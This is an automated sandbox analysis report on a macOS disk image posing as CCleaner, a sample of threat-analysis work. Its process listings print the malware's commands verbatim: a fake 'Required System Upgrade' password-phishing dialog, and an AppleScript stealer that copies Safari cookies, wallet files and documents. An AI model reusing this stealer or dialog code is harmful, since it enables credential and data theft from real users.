a77bcfdecce05bb34c1fb86a63015feb382a782fe1a6c045c404b40398c2c7f0

Resubmissions

13/05/2024, 02:41

240513-c6wt9scd97 8

13/05/2024, 00:34

240513-awwqeabh83 4

Analysis

max time kernel
172s
max time network
181s
platform
macos-10.15_amd64
resource
macos-20240410-en
resource tags

arch:amd64arch:i386image:macos-20240410-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
13/05/2024, 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.dmg
Size

5.8MB
MD5

16c5e782f204bd3d12ee0f184bbea5c3
SHA1

d2a739fa0dabbcc5e1d6376220c0d2a4464a39fe
SHA256

a77bcfdecce05bb34c1fb86a63015feb382a782fe1a6c045c404b40398c2c7f0
SHA512

2072ae6d2cf5f945e986579d35fef3a9bac58c87afeb8f02a441c526a36371f04abcc0dbf102abad7031b67c6281f6964b1da378715f061d7328adb391f5a5ca
SSDEEP

49152:lrBnHQNZJ5Bu7eblRfLQk7TTfPx2YbJho8+MuxI27ngKfi7G2wUccwt:3HQNZq4zL7fPxrjYMQzfi7c9t

Score

8^/10

evasion execution

Malware Config

Signatures

Identifies hardware specifics through system_profiler 4 IoCs

ioc	Process
bash -c "system_profiler SPSoftwareDataType SPHardwareDataType"	Process not Found
system_profiler SPSoftwareDataType SPHardwareDataType	Process not Found
bash -c "system_profiler SPSoftwareDataType SPHardwareDataType"	Process not Found
system_profiler SPSoftwareDataType SPHardwareDataType	Process not Found

AppleScript 1 TTPs 6 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

ioc	Process
osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""	Process not Found
osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\", \"rtf\", \"key\", \"keys\", \"png\", \"jpg\", \"jpeg\", \"wallet\", \"doc\", \"docx\"} tell application \"Finder\" set username to short user name of (system info) if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set bankSize to 0 set SafariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") duplicate file \"Cookies.binarycookies\" of folder SafariFolder to folder destinationFolderPath with replacing repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end tell"	Process not Found
osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""	Process not Found
osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""	Process not Found
osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""	Process not Found
osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\", \"rtf\", \"key\", \"keys\", \"png\", \"jpg\", \"jpeg\", \"wallet\", \"doc\", \"docx\"} tell application \"Finder\" set username to short user name of (system info) if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set bankSize to 0 set SafariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") duplicate file \"Cookies.binarycookies\" of folder SafariFolder to folder destinationFolderPath with replacing repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end tell"	Process not Found

Resource Forking 1 TTPs 1 IoCs

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

evasion

Resource Forking

T1564.009

ioc	Process
/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy	Process not Found

/bin/sh
sh -c "sudo /bin/zsh -c \"open /Volumes/ccleaner/ccleaner.app\""
1⤵
PID:556

/bin/bash
sh -c "sudo /bin/zsh -c \"open /Volumes/ccleaner/ccleaner.app\""
1⤵
PID:556

/usr/bin/sudo
sudo /bin/zsh -c "open /Volumes/ccleaner/ccleaner.app"
1⤵
PID:556
- /bin/zsh
  /bin/zsh -c "open /Volumes/ccleaner/ccleaner.app"
  2⤵
  PID:557
- /usr/bin/open
  open /Volumes/ccleaner/ccleaner.app
  2⤵
  PID:557

/usr/libexec/xpcproxy
xpcproxy com.apple.nehelper
1⤵
PID:558

/usr/libexec/xpcproxy
xpcproxy com.apple.xpc.launchd.oneshot.0x10000001.appname
1⤵
PID:559

/Volumes/ccleaner/ccleaner.app/Contents/MacOS/appname
/Volumes/ccleaner/ccleaner.app/Contents/MacOS/appname -psn_0_163880
1⤵
PID:559
- /usr/bin/dscl
  dscl . authonly root
  2⤵
  PID:562
- /usr/bin/osascript
  osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""
  2⤵
  PID:563
- /usr/bin/dscl
  dscl . authonly root
  2⤵
  PID:621
- /usr/bin/osascript
  osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for root.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""
  2⤵
  PID:622

/usr/libexec/nehelper
/usr/libexec/nehelper
1⤵
PID:558

/usr/libexec/xpcproxy
xpcproxy com.apple.assistantd
1⤵
PID:561

/System/Library/PrivateFrameworks/AssistantServices.framework/Versions/A/Support/assistantd
/System/Library/PrivateFrameworks/AssistantServices.framework/Versions/A/Support/assistantd
1⤵
PID:561

/usr/libexec/xpcproxy
xpcproxy com.apple.security.cloudkeychainproxy3
1⤵
PID:565

/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy
/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy
1⤵
PID:565

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:567

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:567

/usr/libexec/xpcproxy
xpcproxy com.apple.pbs
1⤵
PID:569

/System/Library/CoreServices/pbs
/System/Library/CoreServices/pbs
1⤵
PID:569

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:570

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:573

/usr/libexec/xpcproxy
xpcproxy com.apple.xpc.launchd.oneshot.0x10000002.appname
1⤵
PID:574

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:573

/Volumes/ccleaner/ccleaner.app/Contents/MacOS/appname
/Volumes/ccleaner/ccleaner.app/Contents/MacOS/appname -psn_0_172074
1⤵
PID:574
- /usr/bin/dscl
  dscl . authonly run
  2⤵
  PID:575
- /usr/bin/osascript
  osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""
  2⤵
  PID:579
- /usr/bin/dscl
  dscl . authonly run root
  2⤵
  PID:582
- /usr/bin/osascript
  osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\", \"rtf\", \"key\", \"keys\", \"png\", \"jpg\", \"jpeg\", \"wallet\", \"doc\", \"docx\"} tell application \"Finder\" set username to short user name of (system info) if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set bankSize to 0 set SafariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") duplicate file \"Cookies.binarycookies\" of folder SafariFolder to folder destinationFolderPath with replacing repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end tell"
  2⤵
  PID:583
- /bin/bash
  bash -c "system_profiler SPSoftwareDataType SPHardwareDataType"
  2⤵
  PID:588
- /usr/sbin/system_profiler
  system_profiler SPSoftwareDataType SPHardwareDataType
  2⤵
  PID:588

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:576

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:576

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:577

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:577

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:578

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:578

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:570

/usr/sbin/spctl
/usr/sbin/spctl --assess --type execute /Applications/OneDrive.app
1⤵
PID:581

/usr/bin/csrutil
/usr/bin/csrutil status
1⤵
PID:590

/usr/libexec/xpcproxy
xpcproxy com.apple.icloud.findmydeviced
1⤵
PID:592

/usr/libexec/findmydeviced
/usr/libexec/findmydeviced
1⤵
PID:592

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:597

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:597

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:598

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:598

/usr/libexec/xpcproxy
xpcproxy com.apple.secinitd
1⤵
PID:599

/usr/libexec/secinitd
/usr/libexec/secinitd
1⤵
PID:599

/usr/libexec/xpcproxy
xpcproxy com.apple.xpc.launchd.oneshot.0x10000003.appname
1⤵
PID:602

/Volumes/ccleaner/ccleaner.app/Contents/MacOS/appname
/Volumes/ccleaner/ccleaner.app/Contents/MacOS/appname -psn_0_184365
1⤵
PID:602
- /usr/bin/dscl
  dscl . authonly run
  2⤵
  PID:603
- /usr/bin/osascript
  osascript -e "display dialog \"Required System Upgrade. Please enter passphrase for run.\" default answer \"\" with icon caution buttons {\"Continue\"} default button \"Continue\" giving up after 150 with title \"Application wants to install helper\""
  2⤵
  PID:604
- /usr/bin/dscl
  dscl . authonly run root
  2⤵
  PID:609
- /usr/bin/osascript
  osascript -e "set destinationFolderPath to (path to home folder as text) & \"fg:\" set extensionsList to {\"txt\", \"rtf\", \"key\", \"keys\", \"png\", \"jpg\", \"jpeg\", \"wallet\", \"doc\", \"docx\"} tell application \"Finder\" set username to short user name of (system info) if not (exists folder destinationFolderPath) then make new folder at (path to home folder) with properties {name:\"fg\"} end if set desktopFiles to every file of desktop set documentsFiles to every file of folder \"Documents\" of (path to home folder) set bankSize to 0 set SafariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\") duplicate file \"Cookies.binarycookies\" of folder SafariFolder to folder destinationFolderPath with replacing repeat with aFile in (desktopFiles & documentsFiles) set fileExtension to name extension of aFile if fileExtension is in extensionsList then set fileSize to size of aFile if (bankSize + fileSize) ≤ 10 * 1024 * 1024 then try duplicate aFile to folder destinationFolderPath with replacing set bankSize to bankSize + fileSize end try else exit repeat end if end if end repeat end tell"
  2⤵
  PID:610
- /bin/bash
  bash -c "system_profiler SPSoftwareDataType SPHardwareDataType"
  2⤵
  PID:612
- /usr/sbin/system_profiler
  system_profiler SPSoftwareDataType SPHardwareDataType
  2⤵
  PID:612

/usr/libexec/xpcproxy
xpcproxy com.apple.AddressBook.ContactsAccountsService
1⤵
PID:607

/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
1⤵
PID:607

/usr/libexec/xpcproxy
xpcproxy com.apple.routined
1⤵
PID:608

/usr/libexec/routined
/usr/libexec/routined LAUNCHED_BY_LAUNCHD
1⤵
PID:608

/usr/libexec/xpcproxy
xpcproxy com.apple.Maps.mapspushd
1⤵
PID:611

/usr/bin/csrutil
/usr/bin/csrutil status
1⤵
PID:614

/System/Library/CoreServices/mapspushd
/System/Library/CoreServices/mapspushd
1⤵
PID:611

/usr/libexec/xpcproxy
xpcproxy com.apple.neagent.878568F8-CCE5-4157-8315-22F20DC8FB0A
1⤵
PID:616

/usr/libexec/neagent
/usr/libexec/neagent
1⤵
PID:616

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon
1⤵
PID:619

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon
1⤵
PID:620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Resource Forking

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/Library/Preferences/com.apple.networkextension.uuidcache.plist

Filesize
42B

MD5
ce7f5b3d4bfc7b4b0da6a06dccc515f2

SHA1
ce657a52a052a3aaf534ecfbf7cbdde4ee334c10

SHA256
9261ecceda608ef174256e5fdc774c1e6e3dcf533409c1bc393d490d01c713f1

SHA512
db9de6afa0e14c347aa0988a985b8a453ef133a2413c03bae0fab48bda34d4f9a488db104837a386bb65c393e8f11b1ed4856b211c1c186423649c147d6aabfb

Download Submit
/Library/Preferences/com.apple.networkextension.uuidcache.plist

Filesize
106B

MD5
a60a7bcfc47eacaa66e5e3d701d3ba80

SHA1
7093ffc5beca33187c18461c7ff3259a1781ae35

SHA256
17e96efaf7f2e45e407a3c68fb57b78f09dea6fc1edf3732b888be4a4eadd468

SHA512
58736bd680d6c7a25b8d7db08fd4a258cf761dbaa44a5ece0c2b813ab12c20dc213ab40844dfc780687945cf2459f549f1a38bf3da16c5c332756f3b53e1c3a5

Download Submit
/Library/Preferences/com.apple.networkextension.uuidcache.plist

Filesize
147B

MD5
a6ed424e1135465fac072dc8c30be6a0

SHA1
8cb5811cfe6611074f7e01b8b9a533aa7bed4432

SHA256
c6a15fb293a7994c87cb4665fa076b4804c15a7f17753d267b6e271b036457dc

SHA512
d6dc5f49efacc0bea1d388e490c2e1283f6a6f42829e1ab30ec18b0ad35faf44e21d7780b84b5a2ebaff1e79da6fdc090bc547990b513cb311db82fb54cd8972

Download Submit
/Users/run/Library/Caches/GeoServices/ActiveTileGroup.pbd

Filesize
124KB

MD5
967fd70995ebc166fcc363eee5a9eb39

SHA1
291713deda721f52d02828431e25a3891cd7256d

SHA256
07773782bd77cfbc88f4da82b48947bb5ccee13abaa7a44db1ae0caaa9300491

SHA512
a524a111e0f71062826fecf7410f4e1fb42b185feaa1f07b8512755717062e1b63bd1c94c40a3c1f5d1aecccf6bbc31a1a95612bc1f428718089ea3064a2f9c4

Download Submit
/Users/run/Library/Caches/GeoServices/Experiments.pbd

Filesize
137B

MD5
cfb5a20439fd4febfc8a98b9b4c6bda4

SHA1
274239918c22518712d71451d95e824b5a2e52be

SHA256
b98f0e20cb9f761afcb25f92ca13a73c8737084b693ed1ca7f22a7d03bcfe15c

SHA512
c4e72cb2c94d4006f56bd3824d152ad24d9620100e3942077440ad3bf262b81a39a805d40c9421f93664c42889f909de453abdb08e16d7dfc7665b144e23b027

Download Submit
/Users/run/Library/Caches/GeoServices/Resources/altitude-1281.xml

Filesize
175KB

MD5
4b83b8564ef37e681421517132a79483

SHA1
c53490db81ccdf4012fc0a184cb6bed56d2fde3c

SHA256
49ee8902d335eaa69e7a62b890f8f49d776187965315cc8a628b2530e50418ff

SHA512
107ec81b0d99c3c02836bce271a16fe3cb86da2fc191090da10de548b9ec0b6731eb4c4d293a62810acd5f9e9ffc4511278d187aff26cc2c21ae338aefb5ca67

Download Submit
/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
1KB

MD5
9f0389c8b5d6b512bac38263d7ad0353

SHA1
0545a084dd76f43ad092966c850a87b77079ed65

SHA256
ceb3f24258e04bf9cb1671a1a5a38cfc297b63731d0b19384c49a3438cd74791

SHA512
5be223beadd6b3e33c4d7e3b1769308a4a39432beef820ce0e02c9aaff56f802c3ccc4a2234851ab6b7593752b52f847161079d184e296ed5daa36cabdcb6bbf

Download Submit
/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
2KB

MD5
4361095fc5983aaeccbd6487d399362a

SHA1
fae2d7d843b95a01e8179c2e4addf955f00b641f

SHA256
5e7aa530aaf15e41505ff1396f226caf247013ab20cc31f2c306b82d0b4f49a5

SHA512
b525c49d5c63be8c495defe80f884b93f0debab3675e710c9687c6594642678ba26a66ca7e93a3c4ca3323f102aec3df9b4aa7863b1cf02bf64f466900377f68

Download Submit
/Users/run/Library/Saved Application State/com.apple.osascript.savedState/data.data

Filesize
1KB

MD5
d2411e3989bbde4433b79aa9303d8868

SHA1
9c2f24dffdfecdcb98f6ab40b933ee2dd8867f6f

SHA256
3977d45d2a952e3100b94456e204a44d23102facf4a1b815b129d09d4e0a7ba9

SHA512
19bee50ec31edeab03711ccdc6b5c9b680875ef0858ea24cb5a26e9955dffef800e7d4d546e5bb55f097ace9e80938f0bb40e27b66bce8ca14d84e5adba9059e

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/assistantd//mds/mdsDirectory.db

Filesize
47KB

MD5
0e4a0d1ceb2af6f0f8d0167ce77be2d3

SHA1
414ba4c1dc5fc8bf53d550e296fd6f5ad669918c

SHA256
cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030

SHA512
1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/assistantd//mds/mdsObject.db

Filesize
4KB

MD5
d3a1859e6ec593505cc882e6def48fc8

SHA1
f8e6728e3e9de477a75706faa95cead9ce13cb32

SHA256
3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c

SHA512
ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818

Download Submit